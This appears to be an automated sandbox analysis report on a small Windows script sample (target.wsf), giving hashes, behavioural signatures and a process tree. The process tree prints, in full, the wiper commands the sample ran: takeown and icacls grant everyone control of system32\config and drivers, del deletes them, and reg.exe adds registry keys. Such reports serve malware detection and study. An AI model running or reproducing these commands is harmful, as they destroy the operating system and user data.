Analysis
-
max time kernel
139s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
15-08-2024 21:40
Static task
static1
Behavioral task
behavioral1
Sample
target.wsf
Resource
win7-20240729-en
General
-
Target
target.wsf
-
Size
3KB
-
MD5
84b27604951d4deb2f10cc65c8f5c8a4
-
SHA1
74b27bad7133462abf462923dd3d056a4d655941
-
SHA256
ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
-
SHA512
d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 4228 takeown.exe 2412 takeown.exe 3672 icacls.exe 4060 icacls.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation cmd.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 4228 takeown.exe 2412 takeown.exe 3672 icacls.exe 4060 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 5 IoCs
Processes:
reg.exereg.execmd.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*.dll\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*.exe\ reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*.dll reg.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs regedit.exe 1 IoCs
Processes:
regedit.exepid process 2968 regedit.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 2412 takeown.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 2028 wrote to memory of 4984 2028 cmd.exe WScript.exe PID 2028 wrote to memory of 4984 2028 cmd.exe WScript.exe PID 4984 wrote to memory of 2024 4984 WScript.exe cmd.exe PID 4984 wrote to memory of 2024 4984 WScript.exe cmd.exe PID 4984 wrote to memory of 3472 4984 WScript.exe cmd.exe PID 4984 wrote to memory of 3472 4984 WScript.exe cmd.exe PID 2024 wrote to memory of 4228 2024 cmd.exe takeown.exe PID 2024 wrote to memory of 4228 2024 cmd.exe takeown.exe PID 3472 wrote to memory of 2412 3472 cmd.exe takeown.exe PID 3472 wrote to memory of 2412 3472 cmd.exe takeown.exe PID 2024 wrote to memory of 3672 2024 cmd.exe icacls.exe PID 2024 wrote to memory of 3672 2024 cmd.exe icacls.exe PID 3472 wrote to memory of 4060 3472 cmd.exe icacls.exe PID 3472 wrote to memory of 4060 3472 cmd.exe icacls.exe PID 4984 wrote to memory of 2564 4984 WScript.exe reg.exe PID 4984 wrote to memory of 2564 4984 WScript.exe reg.exe PID 4984 wrote to memory of 1332 4984 WScript.exe reg.exe PID 4984 wrote to memory of 1332 4984 WScript.exe reg.exe PID 4984 wrote to memory of 3432 4984 WScript.exe reg.exe PID 4984 wrote to memory of 3432 4984 WScript.exe reg.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4228
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4060
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCR\*.dll3⤵
- Modifies registry class
PID:2564
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCR\*.exe3⤵
- Modifies registry class
PID:1332
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKLM\*3⤵
- Modifies registry key
PID:3432
-
-
-
C:\Windows\regedit.exe"C:\Windows\regedit.exe"1⤵
- Runs regedit.exe
PID:2968
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD584b27604951d4deb2f10cc65c8f5c8a4
SHA174b27bad7133462abf462923dd3d056a4d655941
SHA256ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
SHA512d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce
-
Filesize
79B
MD5dfcef0997fe6b53193f96908bc2d7839
SHA1bec87de5852184953fe5025aa7a6017e23deead1
SHA2569d2e842fed982dd1f6d185c93feedacb4ac5670f61d9f1934509f159e62a6168
SHA512ed4c7fc86525e24651e5c10533da47065d78076b47caacbb08003ed7b475ac23b41fe623b9db5330b3d947ee9df6043f2bf8c77722cab99a864ae5f7d90a2f74